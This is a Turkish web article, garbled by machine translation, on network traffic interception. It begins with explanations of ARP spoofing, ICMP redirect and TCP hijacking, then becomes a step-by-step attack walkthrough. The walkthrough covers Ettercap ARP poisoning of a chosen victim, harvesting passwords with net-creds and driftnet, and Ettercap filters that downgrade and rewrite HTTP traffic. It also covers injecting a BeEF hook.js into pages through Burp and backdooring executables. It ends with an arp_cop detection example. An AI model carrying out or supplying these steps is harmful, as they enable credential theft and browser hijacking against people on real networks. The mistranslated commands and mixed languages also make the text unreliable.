Ev › Kurulum ve konfigürasyon › Bilgisayar korsanları bunu trafiği yönlendirmek için kullanır. Hacker saldırı yöntemleri. Burp ile veri sahteciliği

Bilgisayar korsanları bunu trafiği yönlendirmek için kullanır. Hacker saldırı yöntemleri. Burp ile veri sahteciliği

Ağ trafiğini ele geçirme yöntemleri

Ağ analizörü programlarını kullanarak ağı dinlemek ilk, en basit bir şekilde veri müdahalesi.

Ağın gizlice dinlenmesine karşı koruma sağlamak için şunu kullanın: özel programlarörneğin, ağ trafiğini dinleyen ağdaki bilgisayarları tanımlayabilen AntiSniff.

Sorunlarını çözmek için, antisniffer programları ağda dinleme cihazlarının varlığına dair özel bir işaret kullanır - algılama bilgisayarının ağ kartı özel bir dinleme modunda olmalıdır. Dinleme modundayken ağ bilgisayarları, test edilen ana bilgisayara gönderilen IP datagramlarına özel bir şekilde tepki verir. Örneğin, dinleyen ana bilgisayarlar genellikle yalnızca ana bilgisayarın adresine gönderilen datagramları değil, gelen tüm trafiği işler. AntiSniff'in tanıyabileceği şüpheli ana bilgisayar davranışını gösteren başka işaretler de vardır.

Kuşkusuz, saldırganın bakış açısından gizlice dinlemek çok faydalıdır, çünkü kişinin birçok yararlı bilgi elde etmesine olanak tanır - ağ üzerinden iletilen şifreler, ağ bilgisayarlarının adresleri, gizli veriler, mektuplar vb. Bununla birlikte, basit bir dinleme, bir bilgisayar korsanının verileri değiştirmek ve bozmak amacıyla iki ana bilgisayar arasındaki ağ iletişimine müdahale etmesine izin vermez. Böyle bir sorunu çözmek için daha karmaşık bir teknolojiye ihtiyaç vardır.

Pirinç. 1 Yanlış ARP isteği

Bir bilgisayar korsanının A ve B ana bilgisayarları arasındaki ağ iletişimini engellemek için ARP'yi nasıl kullanabileceğini görelim.

Bilgisayar korsanı, A ve B ana bilgisayarları arasındaki ağ trafiğini engellemek için IP adresini bu ana bilgisayarlara empoze eder, böylece A ve B, mesaj alışverişinde bulunurken bu sahte IP adresini kullanır. Bilgisayar korsanı IP adresini empoze etmek için aşağıdaki işlemleri gerçekleştirir.

Saldırgan, örneğin W2RK paketindeki nbtstat komutunu kullanarak A ve B ana bilgisayarlarının MAC adreslerini belirler.
Saldırgan, A ve B ana bilgisayarlarının tanımlanmış MAC adreslerine, ana bilgisayarların IP adreslerinin bilgisayarların MAC adreslerine çözümlenmesine yönelik taleplere sahte ARP yanıtları olan mesajlar gönderir. Ana Bilgisayar A, Ana Bilgisayar B'nin IP adresinin saldırganın bilgisayarının MAC adresine karşılık geldiği konusunda bilgilendirilir; Ana bilgisayar B, ana bilgisayar A'nın IP adresinin aynı zamanda saldırganın bilgisayarının MAC adresine de karşılık geldiği konusunda bilgilendirilir.
A ve B ana bilgisayarları, alınan MAC adreslerini ARP önbelleklerinde saklar ve ardından bunları birbirlerine mesaj göndermek için kullanırlar. A ve B IP adresleri saldırganın bilgisayarının MAC adresine karşılık geldiğinden, A ve B ana bilgisayarları, hiçbir şüphe duymadan, mesajlarıyla her şeyi yapabilen bir aracı aracılığıyla iletişim kurar.

Bu tür saldırılara karşı korunmak için ağ yöneticilerinin, ağ bilgisayarlarının MAC adresleri ile IP adresleri arasındaki yazışma tablosunu içeren bir veritabanı tutması gerekir.

UNIX ağlarında, bu tür sahte ARP isteği saldırısı, ağ trafiğini izlemeye ve yönetmeye yönelik sistem yardımcı programları (örneğin, arpredirect) kullanılarak uygulanabilir. Ne yazık ki, bu tür güvenilir yardımcı programlar Windows ağlarında uygulanmıyor gibi görünüyor. Örneğin, NTsecurity web sitesinde, ağ ana bilgisayarları arasındaki trafiği yeniden yönlendirmek için bir araç olarak sunulan GrabitAII yardımcı programını indirebilirsiniz. Bununla birlikte, GrabitAII yardımcı programının işlevselliğinin temel kontrolü, işlevlerinin uygulanmasında tam başarının hala çok uzakta olduğunu göstermektedir.

Saldırgan, ağ trafiğini engellemek için, örneğin sahte ICMP Yönlendirme mesajlarını kullanarak ağ yönlendiricisinin gerçek IP adresini kendi IP adresiyle taklit edebilir. Ana Bilgisayar A, RFC-1122'ye göre, alınan Yönlendirme mesajını başka bir ana bilgisayara, örneğin B'ye gönderilen bir datagrama yanıt olarak algılamalıdır. Ana Bilgisayar A, Yönlendirme mesajı üzerindeki eylemlerini, alınan Yönlendirme mesajının içeriğine göre belirler, ve yeni bir rota boyunca A'dan B'ye Yönlendir'de datagram yeniden yönlendirmesi belirtilmişse, A ana bilgisayarının yapacağı şey tam olarak budur.

Pirinç. 2 Yanlış yönlendirme

Yanlış yönlendirme yapabilmek için saldırganın organizasyonla ilgili bazı detayları bilmesi gerekir. yerel ağ A ana bilgisayarının bulunduğu, özellikle trafiğin A ana bilgisayarından B'ye gönderildiği yönlendiricinin IP adresi. Bunu bilen saldırgan, gönderenin IP adresinin yönlendiricinin IP'si olarak tanımlandığı bir IP datagramı oluşturacaktır. adresi belirtilir ve alıcı, ana bilgisayar A olarak belirtilir. Datagramda ayrıca, yeni yönlendiricinin adres alanının saldırganın bilgisayarının IP adresine ayarlandığı bir ICMP Yönlendirme mesajı da bulunur. Böyle bir mesaj alan A sunucusu, tüm mesajları saldırganın bilgisayarının IP adresine gönderecektir.

Böyle bir saldırıya karşı korunmak için, A ana bilgisayarında ICMP Yönlendirme mesajlarının işlenmesini devre dışı bırakmalısınız (örneğin bir güvenlik duvarı kullanarak) ve tracert komutu (Unix'te bu tracerout komutudur) saldırganın bilgisayarının IP adresini açığa çıkarabilir. . Bu yardımcı programlar, elbette ağ yöneticisi dikkatli olmadığı sürece, yerel ağda kurulum sırasında sağlanmayan ek bir rota bulma yeteneğine sahiptir.

Yukarıdaki müdahale örnekleri (saldırganların yeteneklerinin sınırlı olmaktan çok uzak olduğu), verilerin gizli bilgiler içermesi durumunda ağ üzerinden iletilen verilerin korunması gerektiğine ikna etmektedir. Ağ trafiğinin ele geçirilmesine karşı korunmanın tek yöntemi, kriptografik algoritmaları ve şifreleme protokollerini uygulayan ve gizli bilgilerin ifşa edilmesini ve değiştirilmesini önleyen programların kullanılmasıdır. Bu tür sorunları çözmek için kriptografi, güvenli protokoller üzerinden iletilen mesajların şifrelenmesi, imzalanması ve orijinalliğinin doğrulanması için araçlar sağlar.

Bilgi alışverişini korumaya yönelik tüm kriptografik yöntemlerin pratik uygulaması, VPN ağları(Sanal Özel Ağ - Sanal özel ağlar).

TCP bağlantısının kesilmesi

En karmaşık ağ trafiğini durdurma saldırısı, bir bilgisayar korsanının, saldırıya uğrayan ana bilgisayara TCP paketleri oluşturup göndererek ana bilgisayarla mevcut iletişim oturumunu kesintiye uğrattığı TCP bağlantısını yakalama (TCP ele geçirme) olarak değerlendirilmelidir. Daha sonra, TCP protokolünün kesintiye uğramış bir TCP bağlantısını geri yükleme yeteneğini kullanan bilgisayar korsanı, kesintiye uğrayan iletişim oturumunu yakalar ve bağlantısı kesilen istemci yerine devam ettirir.

TCP protokolü (İletim Kontrol Protokolü) temel aktarım protokollerinden biridir. OSI seviyesi sanal bir iletişim kanalı üzerinden mantıksal bağlantılar kurmanıza olanak tanır. Bu kanal üzerinden paketler sıraları kaydedilerek iletilir ve alınır, paketlerin akışı kontrol edilir, bozuk paketlerin yeniden iletimi düzenlenir ve oturum sonunda iletişim kanalı kesilir. TCP tek protokoldür temel protokol Gelişmiş mesaj tanımlama ve bağlantı sistemine sahip TCP/IP ailesindendir.

Yazılım paketi algılayıcılarına genel bakış

Tüm yazılım algılayıcıları iki kategoriye ayrılabilir: Başlatmayı destekleyen algılayıcılar Komut satırı ve grafiksel bir arayüze sahip algılayıcılar. Ancak bu yeteneklerin her ikisini de birleştiren algılayıcıların bulunduğunu not ediyoruz. Ek olarak, algılayıcılar destekledikleri protokoller, ele geçirilen paketlerin analiz derinliği, filtreleri yapılandırma yeteneği ve diğer programlarla uyumluluk olasılığı açısından birbirlerinden farklılık gösterir.

Genellikle herhangi bir algılayıcının penceresi grafik arayüzüüç alandan oluşmaktadır. Bunlardan ilki, ele geçirilen paketlerin özet verilerini görüntüler. Genellikle bu alan minimum sayıda alanı görüntüler: paket müdahale süresi; Paket göndericisinin ve alıcısının IP adresleri; Paketin gönderici ve alıcısının MAC adresleri, kaynak ve hedef port adresleri; protokol türü (ağ, aktarım veya uygulama katmanı); ele geçirilen veriler hakkında bazı özet bilgiler. İkinci alan, seçilen bireysel pakete ilişkin istatistiksel bilgileri görüntüler ve son olarak üçüncü alan, paketi onaltılık veya ASCII karakter biçiminde görüntüler.

Hemen hemen tüm paket algılayıcılar, kodu çözülmüş paketleri analiz etmenize izin verir (bu nedenle paket algılayıcılara paket analizörleri veya protokol analizörleri de denir). Sniffer, yakalanan paketleri katmanlar ve protokoller arasında dağıtır. Bazı paket dinleyicileri protokolü tanıyabilir ve yakalanan bilgileri görüntüleyebilir. Bu tür bilgiler genellikle algılama penceresinin ikinci alanında görüntülenir. Örneğin, herhangi bir algılayıcı TCP protokolünü tanıyabilir ve gelişmiş algılayıcılar bu trafiği hangi uygulamanın oluşturduğunu belirleyebilir. Çoğu protokol analizörü 500'den fazla farklı protokolü tanır ve bunları adlarına göre tanımlayabilir ve kodunu çözebilir. Bir algılayıcı ne kadar çok bilgiyi çözebilir ve ekranda görüntüleyebilirse, manüel olarak çözülmesi gereken o kadar az bilgi olacaktır.

Paket koklayıcıların karşılaşabileceği sorunlardan biri, varsayılan bağlantı noktası dışında bir bağlantı noktası kullanarak bir protokolü doğru şekilde tanımlayamamaktır. Örneğin güvenliği artırmak için bazı iyi bilinen uygulamalar, varsayılan bağlantı noktaları dışındaki bağlantı noktalarını kullanacak şekilde yapılandırılabilir. Yani, web sunucusu için ayrılan geleneksel 80 numaralı bağlantı noktası yerine, bu sunucu Bunu 8088 numaralı bağlantı noktasına veya başka bir bağlantı noktasına zorla yeniden yapılandırabilirsiniz. Bu durumda bazı paket analizörleri protokolü doğru şekilde belirleyemez ve yalnızca alt düzey protokol (TCP veya UDP) hakkındaki bilgileri görüntüleyemez.

Ele geçirilen trafik hakkında yararlı analitik bilgiler içeren raporlar oluşturmanıza olanak tanıyan eklentiler veya yerleşik modüller olarak yazılım analitik modülleriyle birlikte gelen yazılım algılayıcıları vardır.

Çoğu yazılım paketi analiz cihazının bir diğer karakteristik özelliği, trafik yakalanmadan önce ve sonra filtreleri yapılandırma yeteneğidir. Filtreler, genel trafikten belirli paketleri belirli bir kritere göre seçer, bu da trafiği analiz ederken gereksiz bilgilerden kurtulmanızı sağlar.

Ettercap'e alternatifler

Ettercap en popüler ortadaki adam saldırı yazılımıdır, ancak en iyisi mi? Talimatların tamamı boyunca, Ettercap'in neredeyse hiçbir zaman tek başına kullanılmadığını, bir veya başka bir programın her zaman bir trafik işleme zincirinde onunla birlikte oluşturulduğunu göreceksiniz. Belki de bu esneklik katar; genel olarak bu yaklaşım UNIX'in temelini oluşturur; bir program bir görevi yerine getirir ve son kullanıcı istenen sonucu elde etmek için çeşitli programları birleştirir. Bu yaklaşımla program kodunun bakımı daha kolaydır, bu tür minyatür "tuğlalardan" herhangi bir karmaşıklık ve esnekliğe sahip bir sistem oluşturabilirsiniz. Bununla birlikte, programların tek bir sonuca ulaşmayı amaçladığı farklı görevlere sahip beş açık konsola sahip olmak pek uygun değildir, sadece daha karmaşıktır, bir aşamada hata yapma olasılığı vardır ve tamamı yapılandırılmıştır. sistem boşuna çalışacaktır.

Net-Creds kokusu:

Ziyaret edilen URL'ler
POST istekleri gönderildi
HTTP formlarındaki oturum açma bilgileri/şifreler
temel HTTP kimlik doğrulaması için oturum açma bilgileri/şifreler
HTTP aramaları
FTP oturum açma bilgileri/şifreleri
IRC oturum açma bilgileri/şifreleri
POP oturum açma bilgileri/şifreleri
IMAP oturum açma bilgileri/şifreleri
Telnet oturum açma bilgileri/şifreleri
SMTP oturum açma bilgileri/şifreleri
SNMP topluluk dizesi
HTTP, SMB, LDAP vb. gibi desteklenen tüm NTLMv1/v2 protokolleri.
Kerberos

Ele geçirilenlerin iyi bir seçimi ve driftnet bu bakımdan daha basittir - yalnızca ele geçirilen görüntüleri gösterir.

Makinenizi yönlendirme moduna geçirin.

Yankı "1" > /proc/sys/net/ipv4/ip_forward

Ettercap'i grafik arayüzle (-G) başlatın:

Ettercap-G

Şimdi Ana Bilgisayarları seçin, Ana Bilgisayarları Tara adlı bir alt öğe vardır. Tarama tamamlandıktan sonra Ana Bilgisayar listesini seçin:

Target1 olarak yönlendiriciyi seçin (Add to Target 1), Target2 olarak ise saldıracağınız cihazı seçin (Add to Target 2).

Ancak burada, özellikle de çok sayıda ana bilgisayar varsa, ilk aksaklık ortaya çıkabilir. Yukarıda sunulan video da dahil olmak üzere çeşitli talimatlarda, yazarlar hedef makineye tırmanıyor (herkesin bir nedenden dolayı Windows'u var) ve komutu kullanarak bu makinenin yerel ağdaki IP'sine bakıyorlar. Katılıyorum, bu seçenek gerçek koşullar için kabul edilemez.

kullanarak tararsanız, bazı sonuçlar elde edebilirsiniz. Ek Bilgiler ana bilgisayarlar hakkında, daha doğrusu ağ kartı üreticisi hakkında:

Nmap -sn 192.168.1.0/24

Veriler hâlâ yeterli değilse işletim sistemini belirlemek için bir tarama yapabilirsiniz:

Nmap -O 192.168.1.0/24

Gördüğümüz gibi IP 192.168.1.33 olan makinenin Windows olduğu ortaya çıktı, bu yukarıdan bir işaret değilse nedir? 😉 hahaha

İkinci hedef olarak bunu ekliyoruz.

Şimdi Mitm menü öğesine gidin. Orada ARP zehirlenmesini seçin... Uzak bağlantıları kokla kutusunu işaretleyin.

Hasat etmeye başlıyoruz, tek pencerede başlatıyoruz

Net krediler

diğerinde (her iki program da seçenek olmadan çalıştırılabilir)

Drift ağı

Veri toplama hemen başladı:

Sağ tarafta, driftnet, ele geçirilen görüntüleri gösterdiği başka bir pencere açtı. Net-creds penceresinde ziyaret edilen siteleri ve ele geçirilen şifreleri görüyoruz:

1.2 Ettercap + Burp Süiti
3. Verileri (ziyaret edilen siteler ve alınan şifreler) Ettercap'ta görüntüleyin

Görünüm menüsünde Bağlantılar ve Profiller sekmelerine erişimimiz var. Ayrıca IP adreslerini çözümle kutusunu da işaretleyebilirsiniz. Bağlantılar elbette bağlantılardır. Ettercap, keşfettiği her ana bilgisayar için profilleri hafızada toplar. Kullanıcılar ve şifreler burada toplanır. Bu durumda, hesap verilerinin (şifrelerin) yakalandığı profiller bir çarpı işaretiyle işaretlenir:

Profillere çok fazla güvenmenize gerek yoktur - örneğin, FTP ve diğer hizmetler için ele geçirilen oturum açma bilgileri ve şifreler işaretlenir ve program, alınan bilgileri kimlik bilgileri olarak açıkça yorumlayabilir. Bu, örneğin temel kimlik doğrulama verilerini, web formlarına girilen oturum açma bilgilerini ve şifreleri içermez.

Connections'da en umut verici veriler yıldız işaretiyle işaretlenmiştir:

Ayrıntıları görüntülemek için bu girişlere çift tıklayabilirsiniz:

Liste boyunca bu yıldızları aramamak için bu alana göre sıralama yapabilirsiniz, hepsi en üstte veya en altta görünecektir:

Temel Kimlik Doğrulaması Yakalandı:

Yandex için giriş şifresi (aşağıda vurgulanmıştır):

Bunlar VKontakte için ele geçirilen kimlik bilgileridir:

Ayrıca en ilginç veriler alt konsolda toplanıyor:

Programın sonuçlarını kaydetmek istiyorsanız bu seçenekleri kullanın (Ettercap'i başlatırken tuşları belirtin:

Günlüğe kaydetme seçenekleri: -w, --write yakalanan verileri pcapfile'a yazar -L, --log tüm trafiği buna yazar -l, --log-info buna yalnızca pasif bilgileri yazar -m, --log-msg tüm mesajları yazar bu -c, --compress'te günlük dosyaları için gzip sıkıştırmasını kullanın

4. Ettercap'te anında veri değişimi
4.1 Ettercap Özel Filtrelerini Kullanma

Not: Tüm testlere rağmen Ettercap filtreleri hala bende işe yaramadı. Sorunun el meselesi mi, donanım özellikleri mi yoksa programın kendisinde bir hata mı olduğunu anlamak zor... Ancak 0.8.2 sürümü için (şu anda en yenisi), filtrelerle ilgili sorunlarla ilgili bir hata raporu var. Genel olarak, hata raporlarına ve forumlara bakılırsa, filtreler ya sık sık düşüyor ya da uzun süredir hiç çalışmıyor. 5 ay önce değişikliklerin yapıldığı bir şube var https://github.com/Ettercap/ettercap/tree/filter-improvements, yani. filtre iyileştirmeleri (filtre iyileştirmeleriyle). Hem bu dal için hem de depodaki versiyon için çok çeşitli testler yapıldı, çeşitli filtreler farklı koşullar altında test edildi, çok zaman harcandı ancak sonuç alınamadı. Bu arada, Kali Linux'ta filtre iyileştirmeleri sürümünü yüklemek için şunu yapmanız gerekir:

Sudo apt-get kaldır ettercap-grafik ettercap-ortak sudo apt-get install git debhelper bison check cmake flex Ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev hayaletscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCS =Açık ../ make sudo make install

Genel olarak filtreleriniz çalışmıyorsa yalnız değilsiniz. Ettercap ile ilgili talimatlarda filtreler konusunu atlayamam, bu yüzden her durumda tartışılacaktır.

Şu ana kadar ARP sahtekarlığı için Ettercap'ı kullanıyorduk. Bu çok yüzeysel bir uygulamadır. Özel filtreler sayesinde trafiğe anında müdahale edebiliyor ve değiştirebiliyoruz. Filtreler ayrı dosyalarda bulunmalı ve kullanılmadan önce Etterfilter programı kullanılarak derlenmelidir. Bağlantının verildiği belgeler yetersiz görünse de aşağıda verilen örneklerle birleştirildiğinde oldukça ilginç filtreler yazmanıza olanak sağlayacaktır.

İlk filtremizi oluşturalım, tüm görselleri şununla değiştirecek:

img_replacer.filter kopyası adlı bir dosyada:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Kabul-Kodlama")) ( replacement("Kabul-Kodlama", "Kabul-Çöp!"); # not: değiştirme dizesi orijinal msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replacement("src=") ile aynı uzunluktadır , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replacement("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn.png\" "); replacement("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replacement("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filtre Ran.\n"); )

Dosyayı derleyin:

Etterfilter img_replacer.filter -o img_replacer.ef

Derleme sonuçları:

Etterfilter 0.8.2 telif hakkı 2001-2015 Ettercap Geliştirme Ekibi 14 protokol tablosu yüklendi: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 sabit yüklendi: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP Kaynak dosyası ayrıştırma "img_replacer.filter" işlemi tamamlandı. Meta ağacın açılması tamamlandı. Etiketlerin gerçek ofsetlere dönüştürülmesi tamamlandı. Çıktıyı "img_replacer.ef" dosyasına yazma işlemi tamamlandı. -> Komut dosyası 18 talimat halinde kodlanmıştır.

-F anahtarı, programa, anahtarı takip eden dosyadan filtreyi yüklemesini söyler. Derlemeden sonra filtreli yeni dosyamızın adı img_replacer.ef olur, dolayısıyla komut şu şekli alır:

Ettercap -G -F img_replacer.ef

Not: Web trafiğini izlediğinizde gördüğünüz paketler şifrelenmiş biçimde olabilir. İçin verimli çalışma filtreler, Ettercap'in formda trafiğe ihtiyacı var düz metin. Bazı gözlemlere göre web sayfalarının kullandığı kodlama türü "Accept-Encoding: gzip, deflate" şeklindedir.

Aşağıda, kodlamanın üzerine yazan ve iletişimi düz metin biçiminde zorlayan bir filtre bulunmaktadır:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replacement("gzip", " "); # not: değiştirilen dizede dört boşluk msg ("beyazlatılmış gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replacement("deflate", " "); # not: değiştirilen satırda yedi boşluk msg("beyazlatılmış deflate\n"); ) )

Filtre yazmanın sözdizimi ayrıntılı olarak anlatılmıştır ve ardından birkaç örnek daha verilmiştir:

# paketteki metnin değiştirilmesi: if (ip.proto == TCP && search(DATA.data, "lol"))( replacement("lol", "smh"); msg("filtre çalıştırıldı"); ) # show mesaj , eğer tcp portu 22 ise if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH package\n"); ) ) # yaz telnet trafiğinin tamamı, ayrıca her paket için ./program yürütün if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # http dışındaki tüm trafiği günlüğe kaydet if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # paket yükündeki bazı işlemler if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " değiştirildi"; DATA .data + 20 = 0x4445; ) # "ettercap" içeren tüm paketleri bırakın if (search(DECODED.data, "ettercap")) ( msg("biri bizim hakkımızda konuşuyor...\n") ; drop() ; kill(); ) # normal ifadeyle eşleşen şifresi çözülmüş ssh paketlerini kaydedin if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # paketleri öldürme if (ip.ttl)< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Burp kullanarak veri değiştirme

Ettercap ve Burp'u paragraf 1.2 veya paragraf 2.2'de anlatıldığı gibi başlatıyoruz.

Burp'ta Proxy -> Seçenekler'e gidin. Orada Eşleştir ve Değiştir'i buluyoruz. Yeni bir kural eklemek için Ekle'yi tıklayın.

İstek başlığı istek başlığıdır
İstek gövdesi - istek gövdesi
Yanıt başlığı - yanıt başlığı
Yanıt gövdesi - yanıt gövdesi
Param adı iste - Parametre adı iste
İstek parametre değeri - İstek parametre değeri
İlk satır isteği - İsteğin ilk satırı

GET yöntemiyle iletilen verileri değiştirmeniz gerekiyorsa bu, başlıklar için geçerlidir.

HTML işaretlemesinde head (head etiketi) diye bir şey de vardır. Yukarıda bahsedilenlerin bu başlıkla hiçbir ilgisi yoktur. Biraz daha yukarıda paket başlıklarından bahsediyoruz. İçeriği değiştirmek istiyorsanız HTML sayfaları, bu durumda head etiketinin içeriğini (örneğin başlık) değiştirecek olsanız bile her zaman İstek başlığı yerine Yanıt gövdesini seçmelisiniz.

Eğer aşina değilseniz düzenli ifadeler, o zaman prensip olarak endişelenecek bir şey yok: HTML çok şeyi affeder ve anlamadığı şeyi görmezden gelir - onu kullanabilirsiniz. Düzenli ifadelerin nasıl kullanılacağını biliyorsanız, size saygı duyuyorum.)))

Örneğin, İstek başlığını Yanıt gövdesi olarak değiştirerek yeni bir kural oluşturalım. Kuralın kendisinde değişiklik yapacağız

Başlık yok

Regex eşleşme kutusunu işaretleyin.

Artık tüm sitelerde (HTTPS olmadan) başlık Başlık Yok olacaktır:

Gövde etiketinden sonra isteğe bağlı bir satır ekleyin (bu, metnin ilk satırı olacaktır). İstek başlığı Yanıt gövdesi olarak değiştirildi. Biz değiştiririz

Regex eşleşme kutusunu işaretleyin.

Sağ üst köşede (düzene bağlı olarak) “Ben iyiyim!” Yazısı belirir. CSS, JavaScript kodu, herhangi bir metin, her şeyi ekleyebilirsiniz. Genel olarak sayfadaki her şeyi kaldırabilir ve ardından onu kendi içeriğinizle doldurabilirsiniz - hepsi hayal gücünüze bağlıdır.

Buradaki fikir, verilerin orijinal sunucuya ve saldırganın sunucusuna gönderilmesini sağlayacak şekilde her formu biraz değiştirmekti (her form için çoklu gönderim uygulayın). Ancak iletilen veri şifrelenmemişse ve ona erişimimiz varsa, o zaman onu zaten görüyoruz, onu herhangi bir sunucuya göndermeye gerek olmadığını düşündük. Bununla birlikte, birinin bir formdan birden fazla sunucuya aynı anda veri gönderme konusunda gerçekten çalışan bir örneğe ihtiyacı varsa.

5. BeEF'e Bağlantı

BeEF'in yeteneklerini kullanmaya başlamak için HTML koduna bir JavaScript dosyası yerleştirmemiz gerekir; genellikle aşağıdaki gibi bir satır:

Sonraki iki yöntem yalnızca bu dizeyi yerleştirme yönteminde farklılık gösterir.

5.1 BeEF'in Ettercap filtreleri kullanılarak bağlanması

[bölüm daha sonra hazırlanacak]

5.2 BeEF'i Burp'a Bağlamak

Tam olarak paragraf 4.2'de yazıldığı gibi başlamanız gerekir. Yalnızca başlıkları değiştirmek ve siteye metin eklemek yerine, JavaScript kodunu satır biçiminde uygulayacağız:

Benim durumumda bu dosya 3000 numaralı bağlantı noktasında IP 192.168.1.36'da mevcuttur. Dosyanın adı hook.js'dir (ayarlardan değiştirilebilir). Onlar. benim durumumda şu satırı enjekte etmem gerekiyor:

Bu, örneğin yeni bir kural oluşturarak, İstek başlığını Yanıt gövdesi olarak değiştirerek yapılabilir. Değiştirme HTML kodunun kendisinde gerçekleşmelidir

Harika, HTTPS'si olmayan herhangi bir web sitesini açtığınızda, HTML koduna JavaScript kodu eklenir, bu da bağlı bir tarayıcı aracılığıyla bilgi toplamanıza ve çeşitli saldırılar gerçekleştirmenize olanak tanır:

6. Arka kapı enfeksiyonu

Yürütülebilir dosyaları hem Ettercap filtrelerini (bazı nedenlerden dolayı artık çalışmayan) hem de aşağıdakileri kullanarak değiştirebilir ve bulaştırabilirsiniz: Üçüncü taraf uygulamaları. Örneğin BDFProxy bunu anında yapabilir. Ne yazık ki, BDFProxy hala Nisan 2016'daki Backdoor Factory güncellemesinin etkisi altında: libmproxy paketi Python'da mitmproxy olarak yeniden adlandırıldı. BDFProxy için libmproxy paketi gerekli bir bağımlılıktır; bu paket olmadan program başlamayacaktır. Bu nedenle, artık BDFProxy'nin "onarılmasından" önce onu kullanmak imkansızdır, çünkü Backdoor Factory kurulu olsa bile BDFProxy programı libmproxy kütüphanesinin yokluğundan şikayet eder...

Benzer bir işlem Burp Suite ile de yapılabilir. Adım adım algoritma sunulmuştur, bu bölümde tekrar yazmanın bir anlamı yoktur.

7. Ettercap eklentilerini kullanma

Ettercap eklentileri hakkında bilgiye buradan ulaşabilirsiniz. Oldukça fazla eklenti var; aşağıda anlatılanlar bana en ilginç geliyor.

Ettercap başlatıldığında eklentiler bağlanabilir, bunun için bir seçenek var:

P, --plugin şunu çalıştır

Eklentiler GUI'den de yüklenebilir:

[MATERYAL HAZIRLANMA AŞAMASINDA]

7.1 arp_cop

ARP isteklerini/yanıtlarını pasif olarak izleyerek şüpheli ARP etkinliğini rapor eder. ARP zehirlenmesi girişimlerini veya basit IP çakışmalarını veya IP değişikliklerini rapor edebilir. Başlangıç olarak bir ana bilgisayar listesi oluşturuyorsanız eklenti daha doğru çalışacaktır.

Ettercap -TQP arp_cop //

ARP sahtekarlığının gerçek tespitine bir örnek:

Genişletmek

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // mial şifresi: ettercap 0.8.2 telif hakkı 2001-2015 Ettercap Geliştirme Ekibi Dinleme yeri: eth0 -> 08:00:27:A3:08:4A 192.168.1.36/ 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL diseksiyonunun etter.conf dosyasında geçerli bir "redir_command_on" komut dosyasına ihtiyacı var Ayrıcalıklar EUID 65534'e düştü EGID 65534... 33 eklenti 42 protokol ayırıcı 57 bağlantı noktası izleniyor 20530 mac satıcı parmak izi 1766 tcp işletim sistemi parmak izi 2182 bilinen hizmet Tarama için 255 ana bilgisayar rastgele seçiliyor... 255 ana bilgisayar için ağ maskesinin tamamı taranıyor... * |====== =============== ============================>| % 100.00 3 ana bilgisayar ana bilgisayar listesine eklendi... Birleşik koklama başlatılıyor... Yalnızca metin Arayüz etkinleştirildi... Satır içi yardım için "h" tuşuna basın arp_cop eklentisi etkinleştiriliyor... arp_cop: eklenti çalışıyor... arp_cop: (yeni ana bilgisayar) ) 192.168.1.1 arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 1 gibi davranıyor 92.168.1.1 arp_cop: (UYARI ) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168.1.1 gibi davranıyor arp_cop: (UYARI) 192.168.1.35, 192.168 gibi 